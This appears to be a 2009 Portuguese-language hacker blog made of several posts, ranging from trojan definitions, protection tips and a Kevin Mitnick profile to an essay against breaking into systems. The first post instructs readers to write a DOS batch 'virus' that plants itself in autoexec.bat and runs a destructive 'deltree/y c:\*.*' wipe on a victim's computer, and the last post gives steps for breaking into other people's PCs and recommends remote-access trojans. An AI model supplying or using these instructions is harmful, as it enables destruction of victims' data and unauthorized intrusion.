Em primeiro lugar, você deve abrir o MS-DOS e seguir os passos abaixo:
Digite: Edit (nome do seu arquivo).bat, deverá aparecer uma tela azul.
Entre com os comandos: @ECHO OFF e BREAK OFF. A página deverá ficar da
seguinte maneira, como está embaixo:
@ECHO OFF
BREAK OFF
Depois disso, a pessoa escolhe o que seu vírus deve fazer. Depois ela usa o comando copy a:\(nome do seu vírus).bat autoexec.bat, ela então terá a certeza de estar executando seu vírus ao iniciar o computador-alvo. Agora vamos supor que o seu vírus seja capaz de apagar todos os arquivos do PC alheio. Você deve usar o seguinte
comando:
deltree/y c:\*.*
Agora, o vírus simples da pessoa está completo. É só a vítima (seu amiguinho) executar o arquivo e pronto!
Importante:
Caso a pessoa passe esse vírus via disquete, ele não deve esqueçer de finalizar o arquivo com o comando deltree/y a:\*.*. Isso serve para não deixar vestígios de seu ato insano.
domingo, 23 de agosto de 2009
Criando vírus!
Postado por ARDL H4CK3R às 14:36 0 comentários
Marcadores: APOC H4CK3ER'S
O que é Trojans?
Um Trojan Horse é um programa que faz algum tipo de atividade maléfica porém ele não se espalha automaticamente.
Geralmente, trojans são malware simples de se remover comparado aos worms e vírus.
A maioria dos trojans incluem também o que chamamos de backdoor.
Também existem os Trojan Droppers. Esses são identificados pelos antivírus como Dropper.X ou Trojan.Dropper/X. Os Droppers seguem a história de Tróia: Droppers são programas que deviam, por exemplo, tocar uma música, quando na verdade instalam o Trojan. Trojan Droppers são comuns em programas ilegais, como geradores de crédito para celulares e ferramentas para criação de vírus.
Postado por ARDL H4CK3R às 14:34 0 comentários
Marcadores: APOC H4CK3ER'S
Veja dicas para rastrear e evitar ataque de hackers na internet !!!!
Já passou o tempo em que segurança de dados era motivo de preocupação apenas de profissionais de tecnologia da informação. Hoje em dia são necessárias algumas precauções para garantir privacidade e evitar transtornos.
Evidentemente, detectar a ação de um vírus ou uma tentativa de invasão com comandos do DOS, requer conhecimento técnico sobre TCP/IP (protocolo padrão da internet). Um meio mais fácil para fazer isso é instalar o programa Xobobus, que alerta o usuário sobre tentativas de invasão.
O Xobobus roda em plataforma Windows e pode ser copiado do site do desenvolvedor: www.xobobus.com.br/main.htm.
De qualquer forma, é melhor prevenir eventos desagradáveis como esses com algumas dicas úteis.
Não abra anexos de e-mail, exceto imagens. Alguns leitores podem achar que esse cuidado é exagerado demais. Talvez até seja, mas com certeza poupa muita dor de cabeça. Desnecessário dizer que programas copiados pela internet são tão perigosos quanto os anexos.
O e-mail é o principal mecanismo para disseminar programas maliciosos chamados "cavalos de Tróia". Esse tipo de programa abre brechas de segurança na máquina e, antes que o usuário se dê conta, a privacidade dos seus dados já se foi, incluindo senhas e informações confidenciais.
Se for realmente necessário abrir algum anexo de e-mail que não seja uma imagem, certifique-se que o anexo esteja "limpo" usando um antivírus atualizado.
Confirme com o remetente o recebimento do anexo também, pois uma vez que as pragas infectam um computador, normalmente elas se disseminam automaticamente, sem o conhecimento do remetente.
Mantenha o sistema operacional atualizado. Se o sistema operacional for qualquer versão do Windows, acesse windowsupdate.microsoft.com e instale os pacotes de atualização crítica disponíveis. Muitas brechas de segurança são causadas por falhas de software que podem ser resolvidas com atualizações constantes.
Se possível, tenha uma versão atualizada de um bom antivírus. Existem muitas opções no mercado e a maioria deles oferece proteção contra cavalos de Tróia e outras formas de ataque.
E por fim, se houver alguma suspeita, desligue o computador e chame um profissional técnico. Em casos como esse ainda é melhor perder algumas horas de trabalho do que colocar em xeque a segurança do seu micro.
Postado por ARDL H4CK3R às 13:31 0 comentários
Marcadores: APOC H4CK3ER'S
O invasor!!!!
Nos anos 90, o americano Kevin Mitnick detonou sistemas secretos e foi perseguido até pelo FBI
1. A trajetória do maior hacker do mundo começou no final dos anos 70. Mitnick era um adolescente, mas já usava computador e modem para bagunçar a telefonia de Los Angeles. Uma de suas brincadeiras clássicas era invadir o serviço de auxílio ao assinante e transferir todas as chamadas para sua casa. Ele atendia às dúvidas com mensagens do tipo: "O número pedido é 555-835 e meio. A senhora sabe teclar ‘meio’?"
2. Antes de hackear as máquinas das centrais telefônicas de Los Angeles, Mitnick precisava de senhas e manuais para preparar a invasão. Ele conseguia tudo isso na base da conversa, telefonando para as companhias e se fazendo passar por funcionário. Mas aos 17 anos, ele exagerou e tentou roubar pessoalmente alguns manuais de uma das empresas. Pouco depois, foi rastreado e passou três meses num reformatório
3. A prisão só serviu para atiçar Mitnick. Livre da cadeia, ele passou a invadir sistemas secretos como a Arpanet, rede de troca de informações militares que daria origem à internet, e computadores do Pentágono. Acabou pego com a mão na massa em 1983, nas máquinas de um campus universitário. E foi para trás das grades de novo, ficando seis meses numa prisão juvenil
4. Após a segunda detenção, ele se tornou ainda mais agressivo. Entre 1987 e 1989, roubou programas de laboratórios e empresas da Califórnia. Para desnortear o FBI, que o rastreava, usava dois computadores: um para as invasões e outro para embaralhar linhas telefônicas que levassem até ele. Delatado por um amigo, pegou um ano de prisão. Três anos depois, foi acusado de hackear computadores em plena condicional e passou a viver foragido
5. Em 1994, ainda clandestino, Kevin tentou roubar programas de Tsutomu Shimomura, um especialista em segurança eletrônica. Para se manter oculto, o hacker usava linhas clonadas de telefone celular. Um rastreamento telefônico sugeriu que Kevin estivesse escondido na Carolina do Norte, do outro lado do país. Munido de laptop e uma antena capaz de rastrear o sistema celular, Tsutomu foi até lá para desmascarar o invasor
6. No primeiro dia da perseguição, Tsutomu encontrou a antena de celular de onde partiam os ataques de Kevin e chamou o FBI. Numa conversa com o síndico de um prédio próximo, os agentes deduziram qual era o apartamento de Mitnick e o prenderam. Ele ficou mais cinco anos na prisão. A cobertura do caso rendeu livros e inúmeras reportagens
7. Solto em 2000, Kevin foi proibido de usar a internet até 21 janeiro de 2003. Hoje, aos 40 anos, é dono de uma empresa que ensina outras companhias a evitar ataques, a Defensive Thinking. Para completar a renda, cobra milhares de dólares para dar palestras no mundo todo e é tratado como pop star onde quer que apareça. Nada mau para um ex-presidiário
Postado por ARDL H4CK3R às 13:28 0 comentários
Marcadores: APOC H4CK3ER'S
Como é feito um ataque hacker?
Os programadores mais hábeis conseguem invadir um computador explorando falhas nos softwares que a gente usa. As brechas mais utilizadas são as "portas" abertas pelos programas para receber arquivos. Quase todo software mantém esse tipo de mecanismo – não fosse assim, sua máquina nem teria como se conectar à internet, por exemplo. O que os hackers fazem é criar programas que enganam essas portas, entrando no computador como se fossem arquivos inofensivos. Mas, depois de terem invadido, esses softwares do mal detonam seu disco rígido. "Ou a máquina trava ou faz tudo que o invasor manda. Ele pode roubar senhas, baixar seus programas e apagar arquivos", diz a programadora Patrícia Amirabile, da fabricante de antivírus McAffe. Esses programas são conhecidos como "Cavalos de Tróia": assim como o lendário cavalo de madeira que os gregos deram de presente aos troianos, eles trazem "soldados" dentro, prontos para assumir o controle da máquina que o recebeu. Se ela for o computador central de um site de comércio eletrônico, por exemplo, o ladrão cibernético pode roubar números de cartão de crédito. Se ela for um servidor de internet, o cidadão não terá dificuldade para desfigurar sites. Na galeria dos hackers mais perseguidos, o campeão é o americano Kevin Mitnick, que durante as décadas de 80 e 90 invadiu até os computadores do Pentágono, o principal órgão de defesa dos Estados Unidos. Outro tipo de invasão hacker é aquela que espalha vírus de computador. A diferença é que tais vírus são criados para se auto-reproduzir pela rede, danificando o maior número possível de máquinas, mas sem deixar o invasor controlá-las. O vírus mais agressivo da história, o MyDoom (algo como "minha danação"), espalhou-se por dezenas de milhões de máquinas em 168 países.
Postado por ARDL H4CK3R às 13:24 0 comentários
Marcadores: APOC H4CK3ER'S
As Ameaças do Hacking!!!
O simples fato de estar conectado à Internet implica em uma série de possibilidades de atentado à sua segurança. Entre as principais ameaças estão:
Redes Corporativas: Disponibilizar serviços Internet em uma rede corporativa pode abrir diversos furos de segurança, permitindo que recursos ou informações da empresa sejam acessados de forma indevida por estranhos.
Servidores: A ameaça de alteração nas informações de servidores pode ser mortalmente prejudicial para uma empresa. Por exemplo, a modificação da especificação de algum produto em um servidor da web pode fazer com que inúmeros negócios sejam perdidos.
Transmissão: Às vezes pode não ser necessário uma invasão de servidores ou redes. É possível violar a transmissão da informação pela Internet, interceptando-se mensagens, arquivos, senhas etc.
Interrupção: Um serviço pode ser atacado de uma maneira menos sutil, mas nem por isso menos perigosa. Pode-se, simplesmente, fazer com que o serviço "caia", deixe de funcionar, e que todos os seus usuários legítimos fiquem inacessíveis.
Negação: Em transações pela Internet, ainda temos um outro problema a solucionar. Negar a participação em uma negociação digital também pode ser considerada um ataque ao seu correto funcionamento.
Postado por ARDL H4CK3R às 13:17 0 comentários
Marcadores: APOC H4CK3ER'S
Os Pontos Fracos!!!!!
Existem inúmeras categorias de ataque a serviços Internet, explorando falhas de software, hardware e principalmente burlando esquemas de segurança ineficazes em nossas políticas operacionais. Por exemplo:
Sniffer: Captura informações que trafegam pela rede, como logins e senhas em texto não-criptografado, podendo ser utilizadas futuramente por um invasor.
Spoof: Baseia-se na confiança da negociação entre servidores, que acreditam na veracidade do endereço de origem daquela ordem ou informação, e podem sofrer um ataque por mensagens na qual a origem é "disfarçada" como sendo de alguém de confiança.
Mudanças de rota: Um ataque desta natureza pode fazer com que toda a informação de um dado servidor seja obrigada a passar por um espião antes de seguir seu caminho, ou simplesmente sejam redirecionadas para lugar nenhum, causando a "queda" do serviço.
Trojan Horse: Um programa pode ser inadvertidamente instalado em um servidor, o qual permitiria uma invasão por alguma porta ou "brecha" propositadamente implantada neste programa.
Replay: Alguma ação, comandos ou seqüência de eventos podem ser observados durante um processo de autenticação, e repetidas, posteriormente, por um invasor para obter acesso a estes sistemas.
Vírus: À primeira vista pode parecer um simples problema de usuários domésticos, mas os vírus, se não forem devidamente eliminados e controlados, podem causar, direta e indiretamente, vários problemas em uma rede, desde a impossibilidade de comunicação interna, até a interrupção dos serviços vitais.
Adulteração: A falta de um controle de conteúdo eficiente pode fazer com que uma informação seja adulterada durante sua transmissão, pondo em risco a comunicação entre dois sistemas.
Alguns produtos, tais como servidores ou até mesmo sistemas operacionais completos, vêm configurados "da fábrica" de uma forma muito pouco segura, e é necessário conhecer todos os aspectos da nova ferramenta instalada no seu sistema para que ela seja corretamente utilizada.
Programas como servidores de mail, ftp, web ou configurações do sistema, como permissões de arquivos, aplicativos desnecessários (tal como um lpd em um servidor exclusivo de web) devem ser completamente vistoriados antes da sua instalação, procurando se informar sobre suas capacidades de auditoria e sobre seus recursos de segurança.
Pode-se ainda, caso o sistema em questão seja inseguro e necessário, cogitar produtos que possam implementar esta segurança à parte, e dar a mesma importância a eles, instalando-os simultaneamente, e nunca "deixar para depois", pois se alguém detectar uma falha no seu sistema, ela será explorada imediatamente!
E o mais importante: estas configurações padrões, ou os erros mais comuns durante as instalações, são os primeiros alvos dos hackers e, em pouquíssimo tempo seu sistema poderá ser completamente comprometido por pura falta de atenção.
Postado por ARDL H4CK3R às 13:15 0 comentários
Marcadores: APOC H4CK3ER'S
As Motivações dos Hacking!!
|
Postado por ARDL H4CK3R às 13:13 0 comentários
Galeria de Hackers Famosos!!!
Kevin David Mitnick (EUA)
O mais famoso hacker do mundo. Atualmente em liberdade condicional, condenado por fraudes no sistema de telefonia, roubo de informações e invasão de sistemas. Os danos materiais são incalculáveis.
Kevin Poulsen (EUA)
Amigo de Mitnick, também especializado em telefonia, ganhava concursos
Mark Abene (EUA)
Inspirou toda uma geração a fuçar os sistemas públicos de comunicação - mais uma vez, a telefonia - e sua popularidade chegou ao nível de ser considerado uma das 100 pessoas mais "espertas" de New York. Trabalha atualmente como consultor em segurança de sistema.
John Draper (EUA)
Praticamente um ídolo dos três acima, introduziu o conceito de Phreaker, ao conseguir fazer ligações gratuitas utilizando um apito de plastico que vinha de brinde em uma caixa de cereais. Obrigou os EUA a trocar de sinalização de controle nos seus sistemas de telefonia.
Johan Helsingius (Finlândia)
Responsável por um dos mais famosos servidores de email anônimo. Foi preso após se recusar a fornecer dados de um acesso que publicou documentos secretos da Church of Scientology na Internet. Tinha para isso um 486 com HD de 200Mb, e nunca precisou usar seu próprio servidor.
Vladimir Levin (Rússia)
Preso pela Interpol após meses de investigação, nos quais ele conseguiu transferir 10 milhões de dólares de contas bancárias do Citibank. Insiste na idéia de que um dos advogados contratados para defendê-lo é (como todo russo neurótico normalmente acharia), na verdade, um agente do FBI. Ele não é tão feio quanto parece nesta foto.
Postado por ARDL H4CK3R às 12:53 0 comentários
O Que é Ser Um Hacker ??
Primeiramente, vamos identificar o termo: Hacker, originalmente, designava qualquer pessoa que fosse extremamente especializada em uma determinada área. Qualquer fera em qualquer assunto, poderia ser considerado um hacker. Por exemplo: sua Tia Matilde pode ser um hacker da culinária, ou seu mecânico predileto pode ser um hacker de automóveis... Somente com a ajuda do cinema americano, é que o termo Hacker de Computador passou a ser utilizado largamente, mas nem por isso perdeu sua identidade. Quem não se lembra do filme War Games, onde um garoto, brincando com seu modem, acessa (por acidente!) o NORAD, simplesmente o computador responsável pela segurança de guerra dos Estados Unidos da América? Evidentemente, as pesquisas e técnicas realizadas pelo garoto para descobrir a senha do suposto jogo (ele não sabia em que estava se metendo) é digna de um hacker. Pelo menos dos hackers daquela época... Seguindo a lógica americana, que produz "filmes propagandas" que induzem os telespectadores a desejarem ser o que o filme mostra - assim como TopGun foi uma propaganda à Marinha, e Cortina de Fogo uma propaganda para o Corpo de Bombeiros, com War Games aconteceu a mesma coisa: vários adolescentes que tinham um modem começaram a sonhar com os controles da terceira guerra mundial em suas mãos, ou mais especificamente em sua escrivaninha, no quarto. Isso não quer dizer que este filme foi a base de lançamento de atitudes hacker por todo o mundo, mas foi um dos responsáveis pela dilatação desses pensamentos. O mercado americano (sim, mais uma vez estamos girando em torno dos Estados Unidos - tem outro jeito?) abarrotou as prateleiras de livros como Cyberpunk, e mais tarde, qualquer nota sobre invasão de sistemas ou crimes relacionados a computadores ganhavam um espaço cada vez maior na mídia. Existiam hackers de verdade sim! Eram pessoas que trabalhavam em projetos de computadores e técnicos altamente especializados. Mas também existiam aqueles garotos, que após descobrirem que invadir um sistema ou lançar um missio não era tão fácil quanto ver um filme ou ler um livro, insistiram e estudaram muito (as maiores virtudes dos hackers são a força de vontade e a dedicação aos estudos), conseguiram muitas proezas e hoje, grande parte trabalha na área de segurança de computadores. O resto está preso. A grande maioria dos hackers é jovem. Dizem que é uma fase da vida de cada micreiro. E além do mais o jovem tem muito mais tempo para estudar e aprender. Depois que cresce, precisa se preocupar com a vida de verdade e passa a trabalhar (geralmente com computadores), deixando de invadir sistemas ou fazer coisas piores. Os poucos que continuam a praticar atos de hacker são espiões industriais ou especialistas em segurança, e passam a fazer um jogo de gente grande, onde a pessoa vai precisar deter de verdade os invasores perigosos (os espiões), e estes se protegerem do risco de invadir sistemas (e da polícia). A filosofia é a seguinte: hackers existem, são e sempre serão poucos! Quando (e se) uma "informação de hacker" chegar às suas mãos, com certeza é porque ela está difundida demais, e não será útil para mais nada. Mais um nível que os hackers sobem e mais um que você sobe atrás deles. Para se chegar ao topo, você precisa se esforçar. Aí entra a velha questão: será que o esforço vale a pena? Para que você entraria em um sistema? Conhecemos (de perto) hackers (ou pretendentes a) que passam a noite inteira tentando quebrar um código, conseguir acessos não autorizados, burlar esquemas de segurança e, às vezes, estragar sistemas de computação. Agora, se você quer ser assim, diga-nos: Você queimaria seus neurônios durante várias madrugadas para tirar um sistema do ar? Um sistema que nunca lhe fez mal ,está lá apenas para servir pessoas que também não fizeram nada contra você? Imagina, o responsável pelo sistema, que precisa do salário da empresa onde trabalha para alimentar seus filhos, pagar o aluguel da casa? É esse cara que você, se metendo a sabichão, vai prejudicar? Qual é o problema do sistema do cara estar com falhas? Quer fazer um favor? Avisa ao responsável onde está o problema e assunto resolvido! Quem sabe você não começa a dar consultoria nesse tipo de assunto e ganha um bom dinheiro... Se você acha que é empolgante invadir sistemas, que dá a maior adrenalina, coisa e tal, experimente o bung jump, ou então dê uma paquerada na noiva daquele troglodita do bloco B, etc... Além do mais, já viu o sol que ta fazendo lá fora? Larga esse computador e vai curtir a vida, cara! Na paz... |
Postado por ARDL H4CK3R às 12:44 0 comentários
Invadindo pela porta 666
Para invadir é facil vc deve ter um programa de conexão via telenet (telnet q ja vem com o WIN95 ou similar) e também um programa chamado aabout. O q deve ser feito, este programa aabout deve ser acionado por ambas as parte (invasor e invadido) e o q ele faz?? Bem, ele abre uma porta de conexão entre os dois CPUs via a porta 666. Vc deve ligar o telenet colocar no rost o numero do IP da pessoa e em port deve-se colocar 666. Bem vc já esta conectado, dai no login vc deve digita cg! (com o "!") e dar um dir vendo tudo o q tem no CPU da outra pessoa
Invadindo pelo IP da vitíma
A invasão pôr IP pode ser feita de varias maneiras, aqui vai um jeito fácil de invadir sem ter q ficar fazendo mil coisas. Aqui vc aprenderá um meio de invadir pôr IP que só é garantido se vc e a pessoa a ser invadida estiverem o com o compartilhamento de dados ligado, e estiver entrando pela rede dial-up com a rede Microsoft instalada.
Se vc não esta com a rede Microsoft instalada e não sabe invadir, ai vai: Primeiro vá em meu computador, painel de controle, rede. Quando vc entrar na rede vai abrir uma caixa de comandos, veja lá se a rede Microsoft esta instalada, se estiver instalada vá em logon principal da rede e escolha cliente para a rede Microsoft , caso não esteja instalada, va em adicionar, na caixa va em cliente, depois em Microsoft e escolha cliente p/ rede Microsoft. Caso vc não ache esses nomes vá em com disco procure lá.
Depois de instalado volte para o meu computador, vá acesso a rede dial-up e clique com o botão direito na conexão q vc faz. Lá vá em propriedades, tipo do servidor, configuração TCP/IP, e especificar o IP. Lá vc poe o Ip do cara q vc vai invadir. Dai é só reconectar, ir em explorando do windows, ambiente de rede, e toda a rede. Assim q vc clicar em toda a rede o CPU do cara aparecera lá.
Usando programas para invasão
Esta técnica, é a mais fácil, mais prática, mais segura. É a minha predileta. Existem vários programas para invasão. Os que eu posso citar e aconselhar são: Back Orifice, Sockets de Troie, NetBus, Master's Paradise e Intruder.
Postado por ARDL H4CK3R às 01:57 0 comentários
Marcadores: APOC H4CK3ER'S



